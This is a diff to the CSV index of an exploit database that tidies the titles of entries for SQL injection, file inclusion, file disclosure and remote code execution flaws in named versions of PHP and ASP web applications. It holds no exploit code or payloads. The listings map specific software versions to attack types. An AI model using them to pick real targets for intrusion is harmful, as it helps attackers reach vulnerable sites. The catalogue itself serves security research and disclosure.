@@ -17475,7 +17480,7 @@ id,file,description,date,author,platform,type,port 3827,platforms/php/webapps/3827.txt,"Sendcard 3.4.1 - (sendcard.php form) Local File Inclusion",2007-05-01,ettee,php,webapps,0 3828,platforms/php/webapps/3828.txt,"WordPress Plugin myflash 1.00 - (wppath) Remote File Inclusion",2007-05-01,Crackers_Child,php,webapps,0 3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - (download.asp) File Disclosure",2007-05-02,Dj7xpl,asp,webapps,0 -3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 - (download.php item) Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps,0 +3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 - 'download.php' Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps,0 3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion",2007-05-02,bd0rk,php,webapps,0 3834,platforms/php/webapps/3834.php,"YaPiG 0.95b - Remote Code Execution",2007-05-02,Dj7xpl,php,webapps,0 3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - SQL Injection",2007-05-02,"Ali Abbasi",php,webapps,0 
@@ -17566,7 +17571,7 @@ id,file,description,date,author,platform,type,port 3972,platforms/php/webapps/3972.txt,"Scallywag - 'template.php path' Remote File Inclusion",2007-05-23,"Mehmet Ince",php,webapps,0 3974,platforms/php/webapps/3974.pl,"Dokeos 1.8.0 - (my_progress.php course) SQL Injection",2007-05-23,Silentz,php,webapps,0 3980,platforms/php/webapps/3980.pl,"Dokeos 1.6.5 - (courseLog.php scormcontopen) SQL Injection",2007-05-24,Silentz,php,webapps,0 -3981,platforms/php/webapps/3981.php,"cpCommerce 1.1.0 - (category.php id_category) SQL Injection",2007-05-24,Kacper,php,webapps,0 +3981,platforms/php/webapps/3981.php,"CPCommerce 1.1.0 - 'id_category' Parameter SQL Injection",2007-05-24,Kacper,php,webapps,0 3983,platforms/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusion",2007-05-24,DeltahackingTEAM,php,webapps,0 3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 - (class.php root) Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0 3988,platforms/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,php,webapps,0 
@@ -18044,7 +18049,7 @@ id,file,description,date,author,platform,type,port 4762,platforms/php/webapps/4762.txt,"nicLOR CMS - 'sezione_news.php' SQL Injection",2007-12-21,x0kster,php,webapps,0 4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 - (output) Remote File Inclusion",2007-12-21,CraCkEr,php,webapps,0 4764,platforms/php/webapps/4764.txt,"Arcadem LE 2.04 - (loadadminpage) Remote File Inclusion",2007-12-21,KnocKout,php,webapps,0 -4765,platforms/php/webapps/4765.txt,"1024 CMS 1.3.1 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2007-12-21,irk4z,php,webapps,0 +4765,platforms/php/webapps/4765.txt,"1024 CMS 1.3.1 - Local File Inclusion / SQL Injection",2007-12-21,irk4z,php,webapps,0 4766,platforms/php/webapps/4766.txt,"mBlog 1.2 - (page) Remote File Disclosure",2007-12-21,irk4z,php,webapps,0 4767,platforms/php/webapps/4767.txt,"Social Engine 2.0 - Multiple Local File Inclusion",2007-12-21,MhZ91,php,webapps,0 4768,platforms/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution",2007-12-21,The:Paradox,php,webapps,0 
@@ -18503,18 +18508,18 @@ id,file,description,date,author,platform,type,port 5391,platforms/php/webapps/5391.php,"Drake CMS 0.4.11 - Blind SQL Injection",2008-04-07,EgiX,php,webapps,0 5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 Plugin Maps - Remote Command Execution",2008-04-07,EgiX,php,webapps,0 5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - 'root' Parameter Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 -5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0 -5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php) File Disclosure",2008-04-07,Stack,php,webapps,0 -5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise - (index.php ID) SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0 -5401,platforms/php/webapps/5401.txt,"My Gaming Ladder 7.5 - (ladderid) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 +5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - 'viewsource.php' Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0 +5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - 'viewsource.php' File Disclosure",2008-04-07,Stack,php,webapps,0 +5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise - 'index.php' SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0 +5401,platforms/php/webapps/5401.txt,"My Gaming Ladder 7.5 - 'ladderid' Parameter SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 5402,platforms/php/webapps/5402.txt,"iScripts Socialware - 'id' SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 5404,platforms/php/webapps/5404.php,"phpTournois G4 - Arbitrary File Upload / Code Execution",2008-04-08,"Charles Fol",php,webapps,0 -5405,platforms/php/webapps/5405.txt,"exbb 0.22 - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities",2008-04-08,The:Paradox,php,webapps,0 -5406,platforms/php/webapps/5406.txt,"Pligg CMS 9.9.0 - (editlink.php id) SQL Injection",2008-04-08,"Guido Landi",php,webapps,0 
+5405,platforms/php/webapps/5405.txt,"ExBB 0.22 - Local / Remote File Inclusion",2008-04-08,The:Paradox,php,webapps,0 +5406,platforms/php/webapps/5406.txt,"Pligg CMS 9.9.0 - 'editlink.php' SQL Injection",2008-04-08,"Guido Landi",php,webapps,0 5407,platforms/php/webapps/5407.php,"FLABER 1.1 RC1 - Remote Command Execution",2008-04-08,EgiX,php,webapps,0 5408,platforms/php/webapps/5408.pl,"LokiCMS 0.3.3 - Remote Command Execution",2008-04-08,girex,php,webapps,0 5409,platforms/asp/webapps/5409.txt,"SuperNET Shop 1.0 - SQL Injection",2008-04-08,U238,asp,webapps,0 -5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x - (matchid) SQL Injection",2008-04-08,0in,php,webapps,0 +5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x - 'matchid' Parameter SQL Injection",2008-04-08,0in,php,webapps,0 5411,platforms/php/webapps/5411.txt,"Dream4 Koobi Pro 6.25 Links - 'categ' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0 5412,platforms/php/webapps/5412.txt,"Dream4 Koobi Pro 6.25 Shop - 'categ' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0 5413,platforms/php/webapps/5413.txt,"Dream4 Koobi Pro 6.25 Gallery - 'galid' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0 
@@ -18522,33 +18527,33 @@ id,file,description,date,author,platform,type,port 5415,platforms/php/webapps/5415.txt,"Dream4 Koobi 4.4/5.4 - gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0 5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion",2008-04-09,bd0rk,php,webapps,0 5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin",2008-04-09,t0pP8uZz,php,webapps,0 -5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure",2008-04-09,JIKO,php,webapps,0 +5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - 'path' Parameter File Disclosure",2008-04-09,JIKO,php,webapps,0 5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version - 'file' Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0 5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection",2008-04-09,"Virangar Security",php,webapps,0 -5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - (category id) Blind SQL Injection",2008-04-10,irvian,php,webapps,0 -5423,platforms/php/webapps/5423.txt,"Ksemail - 'index.php language' Local File Inclusion",2008-04-10,dun,php,webapps,0 +5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - 'id' Parameter Blind SQL Injection",2008-04-10,irvian,php,webapps,0 +5423,platforms/php/webapps/5423.txt,"Ksemail - Local File Inclusion",2008-04-10,dun,php,webapps,0 5425,platforms/php/webapps/5425.pl,"LightNEasy 1.2 - (no database) Remote Hash Retrieve Exploit",2008-04-10,girex,php,webapps,0 -5426,platforms/php/webapps/5426.txt,"RX Maxsoft - 'popup_img.php fotoID' SQL Injection",2008-04-10,S@BUN,php,webapps,0 -5428,platforms/php/webapps/5428.txt,"PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection",2008-04-11,parad0x,php,webapps,0 +5426,platforms/php/webapps/5426.txt,"RX Maxsoft - 'fotoID' Parameter SQL Injection",2008-04-10,S@BUN,php,webapps,0 +5428,platforms/php/webapps/5428.txt,"PHPKB Knowledge Base Software 1.5 - 'ID' Parameter SQL 
Injection",2008-04-11,parad0x,php,webapps,0 5429,platforms/php/webapps/5429.txt,"NewsOffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 5431,platforms/php/webapps/5431.txt,"Joomla! Component JoomlaXplorer 1.6.2 - Remote Vulnerabilities",2008-04-11,Houssamix,php,webapps,0 5432,platforms/php/webapps/5432.txt,"PHPAddressBook 2.11 - 'view.php' SQL Injection",2008-04-11,Cr@zy_King,php,webapps,0 5433,platforms/php/webapps/5433.txt,"CcMail 1.0.1 - Insecure Cookie Handling",2008-04-12,t0pP8uZz,php,webapps,0 5434,platforms/php/webapps/5434.pl,"1024 CMS 1.4.2 - Local File Inclusion / Blind SQL Injection",2008-04-13,girex,php,webapps,0 5435,platforms/php/webapps/5435.txt,"Joomla! Component com_extplorer 2.0.0 RC2 - Local Directory Traversal",2008-04-13,Houssamix,php,webapps,0 -5436,platforms/php/webapps/5436.txt,"Pollbooth 2.0 - (pollID) SQL Injection",2008-04-13,S@BUN,php,webapps,0 -5437,platforms/php/webapps/5437.txt,"cpcommerce 1.1.0 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-04-13,BugReport.IR,php,webapps,0 +5436,platforms/php/webapps/5436.txt,"Pollbooth 2.0 - 'pollID' Parameter SQL Injection",2008-04-13,S@BUN,php,webapps,0 +5437,platforms/php/webapps/5437.txt,"CPCommerce 1.1.0 - Cross-Site Scripting / Local File Inclusion",2008-04-13,BugReport.IR,php,webapps,0 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling",2008-04-13,t0pP8uZz,php,webapps,0 5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 - Blind SQL Injection",2008-04-13,Lidloses_Auge,php,webapps,0 5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS - SQL Injection",2008-04-14,cO2,php,webapps,0 -5443,platforms/php/webapps/5443.txt,"SmallBiz eShop - (content_id) SQL Injection",2008-04-14,Stack,php,webapps,0 +5443,platforms/php/webapps/5443.txt,"SmallBiz eShop - 'content_id' Parameter SQL Injection",2008-04-14,Stack,php,webapps,0 5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 - (index.php cat) SQL 
Injection",2008-04-14,"SoSo H H",php,webapps,0 5446,platforms/php/webapps/5446.txt,"BosNews 4.0 - (article) SQL Injection",2008-04-14,Crackers_Child,php,webapps,0 5447,platforms/php/webapps/5447.txt,"Dream4 Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections",2008-04-14,JosS,php,webapps,0 5448,platforms/php/webapps/5448.txt,"Dream4 Koobi Pro 6.25 Poll - 'poll_id' Parameter SQL Injection",2008-04-14,S@BUN,php,webapps,0 5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution",2008-04-14,Ajax,php,webapps,0 5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'index.php cat_id' SQL Injection",2008-04-15,JosS,php,webapps,0 -5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0 +5452,platforms/php/webapps/5452.txt,"LightNEasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0 5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 - SQL Injection (2)",2008-04-15,cO2,php,webapps,0 5456,platforms/asp/webapps/5456.txt,"carbon communities 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0 5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - 'id' SQL Injection",2008-04-16,cO2,php,webapps,0 
@@ -18632,7 +18637,7 @@ id,file,description,date,author,platform,type,port 5553,platforms/asp/webapps/5553.txt,"FipsCMS - 'print.asp lg' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - (index.php cat) SQL Injection",2008-05-07,cOndemned,php,webapps,0 5555,platforms/php/webapps/5555.txt,"gameCMS Lite 1.0 - (index.php systemId) SQL Injection",2008-05-07,InjEctOr5,php,webapps,0 -5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'step1.asp cat_fldAuto' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 +5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'cat_fldAuto' Parameter SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 5557,platforms/php/webapps/5557.pl,"OneCMS 2.5 - Blind SQL Injection",2008-05-07,Cod3rZ,php,webapps,0 5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - (Remote File Inclusion / Cross-Site Scripting) Multiple Remote Vulnerabilities",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0 5559,platforms/php/webapps/5559.txt,"EZContents CMS 2.0.0 - Multiple SQL Injections",2008-05-07,"Virangar Security",php,webapps,0 
@@ -19126,7 +19131,7 @@ id,file,description,date,author,platform,type,port 6143,platforms/php/webapps/6143.txt,"Getacoder clone - (sb_protype) SQL Injection",2008-07-27,"Hussin X",php,webapps,0 6144,platforms/php/webapps/6144.txt,"GC Auction Platinum - (cate_id) SQL Injection",2008-07-27,"Hussin X",php,webapps,0 6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS - (art) SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0 -6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - (story.php id) SQL Injection",2008-07-28,"Hussin X",php,webapps,0 +6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - 'story.php' SQL Injection",2008-07-28,"Hussin X",php,webapps,0 6147,platforms/php/webapps/6147.txt,"Youtuber Clone - 'ugroups.php UID' SQL Injection",2008-07-28,"Hussin X",php,webapps,0 6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 - 'Language' Local File Inclusion",2008-07-28,NoGe,php,webapps,0 6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 
@@ -19550,7 +19555,7 @@ id,file,description,date,author,platform,type,port 6737,platforms/php/webapps/6737.txt,"LokiCMS 0.3.4 - 'index.php' Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0 6739,platforms/php/webapps/6739.txt,"NewLife Blogger 3.0 - Insecure Cookie Handling / SQL Injection",2008-10-12,Pepelux,php,webapps,0 6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 - 'index.php' Local File Download",2008-10-12,JosS,php,webapps,0 -6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 - writeconfig() Remote Command Execution",2008-10-13,girex,php,webapps,0 +6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 - 'writeconfig()' Remote Command Execution",2008-10-13,girex,php,webapps,0 6744,platforms/php/webapps/6744.txt,"LokiCMS 0.3.4 - 'admin.php' Create Local File Inclusion",2008-10-13,JosS,php,webapps,0 6745,platforms/php/webapps/6745.txt,"ParsBlogger - 'links.asp id' SQL Injection",2008-10-13,"Hussin X",php,webapps,0 6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection",2008-10-13,d3v1l,php,webapps,0 
@@ -20007,7 +20012,7 @@ id,file,description,date,author,platform,type,port 7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion",2008-11-30,"CWH Underground",php,webapps,0 7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps,0 7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - (SQL Injection / Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities",2008-11-30,NoGe,php,webapps,0 -7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0 +7308,platforms/php/webapps/7308.txt,"CPCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion",2008-11-30,NoGe,php,webapps,0 7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - (edit.php site) SQL Injection",2008-12-01,JIKO,php,webapps,0 7312,platforms/php/webapps/7312.txt,"Andy's PHP KnowledgeBase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps,0 
@@ -20739,7 +20744,7 @@ id,file,description,date,author,platform,type,port 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0 8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0 8454,platforms/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps,0 -8455,platforms/php/webapps/8455.txt,"cpCommerce 1.2.8 - (id_document) Blind SQL Injection",2009-04-16,NoGe,php,webapps,0 +8455,platforms/php/webapps/8455.txt,"CPCommerce 1.2.8 - 'id_document' Parameter Blind SQL Injection",2009-04-16,NoGe,php,webapps,0 8457,platforms/php/webapps/8457.txt,"NetHoteles 3.0 - (ficha.php) SQL Injection",2009-04-16,snakespc,php,webapps,0 8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - (manage-admin.php) Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion",2009-04-16,JosS,php,webapps,0 
@@ -20934,7 +20939,7 @@ id,file,description,date,author,platform,type,port 8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET - Remote File Disclosure",2009-05-26,Securitylab.ir,asp,webapps,0 8787,platforms/php/webapps/8787.txt,"MyFirstCMS 1.0.2 - Arbitrary File Delete",2009-05-26,darkjoker,php,webapps,0 8788,platforms/php/webapps/8788.txt,"Mole Adult Portal Script - 'profile.php user_id' SQL Injection",2009-05-26,Qabandi,php,webapps,0 -8790,platforms/php/webapps/8790.pl,"cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion",2009-05-26,StAkeR,php,webapps,0 +8790,platforms/php/webapps/8790.pl,"CPCommerce 1.2.x - 'GLOBALS[prefix]' Arbitrary File Inclusion",2009-05-26,StAkeR,php,webapps,0 8791,platforms/php/webapps/8791.txt,"WordPress Plugin Lytebox - (wp-lytebox) Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps,0 8792,platforms/php/webapps/8792.txt,"Webradev Download Protect 1.0 - Remote File Inclusion",2009-05-26,asL-Sabia,php,webapps,0 8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script - (Authentication Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps,0 
@@ -21429,7 +21434,7 @@ id,file,description,date,author,platform,type,port 9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0 9609,platforms/php/webapps/9609.txt,"Mambo Component 'com_hestar' - SQL Injection",2009-09-09,M3NW5,php,webapps,0 9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 -9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - (cacheId) Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 +9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion",2009-09-10,Kurd-Team,php,webapps,0 9625,platforms/php/webapps/9625.txt,"nullam blog 0.1.2 - (Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-09-10,"Salvatore Fresta",php,webapps,0 9629,platforms/php/webapps/9629.txt,"Graffiti CMS 1.x - Arbitrary File Upload",2009-09-10,"Alexander Concha",php,webapps,0 
@@ -22922,7 +22927,7 @@ id,file,description,date,author,platform,type,port 12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0 -12436,platforms/php/webapps/12436.txt,"Pligg CMS 1.0.4 - (story.php?id) SQL Injection",2010-04-28,"Don Tukulesto",php,webapps,0 +12436,platforms/php/webapps/12436.txt,"Pligg CMS 1.0.4 - 'story.php' SQL Injection",2010-04-28,"Don Tukulesto",php,webapps,0 12438,platforms/php/webapps/12438.txt,"SoftBizScripts Dating Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12439,platforms/php/webapps/12439.txt,"SoftBizScripts Hosting Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12440,platforms/php/webapps/12440.txt,"Joomla! Component 'Wap4Joomla' - 'wapmain.php' SQL Injection",2010-04-28,Manas58,php,webapps,0 
@@ -23002,7 +23007,7 @@ id,file,description,date,author,platform,type,port 12556,platforms/php/webapps/12556.txt,"Tadbir CMS - 'FCKeditor' Arbitrary File Upload",2010-05-10,"Pouya Daneshmand",php,webapps,0 12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0 12558,platforms/php/webapps/12558.txt,"29o3 CMS - (LibDir) Multiple Remote File Inclusion",2010-05-10,eidelweiss,php,webapps,0 -12560,platforms/php/webapps/12560.txt,"724CMS 4.59 Enterprise - SQL Injection",2010-05-10,cyberlog,php,webapps,0 +12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection",2010-05-10,cyberlog,php,webapps,0 12561,platforms/php/webapps/12561.txt,"PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections",2010-05-10,R3d-D3V!L,php,webapps,0 12562,platforms/php/webapps/12562.txt,"Waibrasil - Remote File Inclusion / Local File Inclusion",2010-05-10,eXeSoul,php,webapps,0 12563,platforms/php/webapps/12563.txt,"Fiomental & Coolsis Backoffice - Multiple Vulnerabilities",2010-05-10,MasterGipy,php,webapps,0 
@@ -24220,7 +24225,7 @@ id,file,description,date,author,platform,type,port 15856,platforms/php/webapps/15856.php,"TYPO3 - Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0 15858,platforms/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 NS8.1)",2010-12-29,Saif,php,webapps,0 -15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 +15863,platforms/php/webapps/15863.txt,"LightNEasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15864,platforms/php/webapps/15864.txt,"Ignition 1.3 - (page.php) Local File Inclusion",2010-12-30,cOndemned,php,webapps,0 15865,platforms/php/webapps/15865.php,"Ignition 1.3 - Remote Code Execution",2010-12-30,cOndemned,php,webapps,0 15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - Cross-Site Scripting / Remote Code Execution",2011-01-05,mr_me,php,webapps,0 
@@ -25710,7 +25715,7 @@ id,file,description,date,author,platform,type,port 21552,platforms/php/webapps/21552.txt,"PHP Classifieds 6.0.5 - Cross-Site Scripting",2002-06-14,windows-1256,php,webapps,0 21553,platforms/cgi/webapps/21553.txt,"Mewsoft NetAuction 3.0 - Cross-Site Scripting",2002-06-14,windows-1256,cgi,webapps,0 21557,platforms/php/webapps/21557.txt,"ZeroBoard 4.1 - PHP Include File Arbitrary Command Execution",2002-06-15,onlooker,php,webapps,0 -21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 - MagicCard.cgi Arbitrary File Disclosure",2002-06-15,cult,cgi,webapps,0 +21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 - 'MagicCard.cgi' Arbitrary File Disclosure",2002-06-15,cult,cgi,webapps,0 21562,platforms/java/webapps/21562.txt,"Wolfram Research webMathematica 4.0 - File Disclosure",2002-06-17,"Andrew Badr",java,webapps,0 21563,platforms/php/webapps/21563.txt,"osCommerce 2.1 - Remote File Inclusion",2002-06-16,"Tim Vandermeerch",php,webapps,0 21564,platforms/php/webapps/21564.txt,"PHP-Address 0.2 e - Remote File Inclusion",2002-06-17,"Tim Vandermeerch",php,webapps,0 
@@ -26352,7 +26357,7 @@ id,file,description,date,author,platform,type,port 23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Persistent Cross-Site Scripting",2012-12-16,limb0,php,webapps,0 23428,platforms/php/webapps/23428.html,"Mambo 4.5 Server - user.php Script Unauthorized Access",2003-12-10,frog,php,webapps,0 23429,platforms/php/webapps/23429.txt,"Mambo Open Source 4.0.14 Server - SQL Injection",2003-12-10,"Chintan Trivedi",php,webapps,0 -23430,platforms/php/webapps/23430.txt,"Mambo Open Source 4.0.14 - PollBooth.php Multiple SQL Injection",2003-12-10,frog,php,webapps,0 +23430,platforms/php/webapps/23430.txt,"Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injection",2003-12-10,frog,php,webapps,0 23432,platforms/cgi/webapps/23432.txt,"RemotelyAnywhere - Default.HTML Logout Message Injection",2003-12-11,"Oliver Karow",cgi,webapps,0 23434,platforms/php/webapps/23434.pl,"osCommerce 2.2 - SQL Injection",2003-12-13,JeiAr,php,webapps,0 23440,platforms/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,asp,webapps,0 
@@ -29144,7 +29149,7 @@ id,file,description,date,author,platform,type,port 27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0 27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 - ImageList.php Cross-Site Scripting",2006-04-22,nukedx,php,webapps,0 27731,platforms/php/webapps/27731.txt,"PhotoKorn 1.53/1.54 - 'index.php' Multiple Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 -27732,platforms/php/webapps/27732.txt,"PhotoKorn 1.53/1.54 - postcard.php id Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 +27732,platforms/php/webapps/27732.txt,"PhotoKorn 1.53/1.54 - 'id' Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27733,platforms/php/webapps/27733.txt,"PhotoKorn 1.53/1.54 - print.php cat Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27734,platforms/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,php,webapps,0 27735,platforms/php/webapps/27735.txt,"PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-25,arko.dhar,php,webapps,0 
